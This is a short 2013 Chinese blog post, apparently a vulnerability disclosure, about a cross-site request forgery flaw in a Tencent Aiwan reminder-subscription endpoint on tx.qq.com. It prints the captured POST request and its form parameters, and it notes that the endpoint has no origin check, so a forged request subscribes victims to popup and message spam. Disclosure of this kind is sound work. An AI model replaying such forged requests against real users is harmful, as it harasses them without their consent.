腾讯爱玩某处csrf导致骚扰用户(QQ弹窗+QQ会话+微博)

wps_clip_image-24519

点击提醒,然后抓包:

POST /dyid_proc.php HTTP/1.1

Host: tx.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://tx.qq.com/proxy.html

Content-Length: 61

Cookie: .....

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

POST数据:

id

5547

interval

180

stype

0

threshold

1

tips_type

7

type

new

就可以成功订阅提醒,随后导致弹窗骚扰用户..

wps_clip_image-4481

wps_clip_image-19554

确定没有来源验证哦~

posted @ 2013-07-11 13:37  y0umer  阅读(248)  评论(0编辑  收藏  举报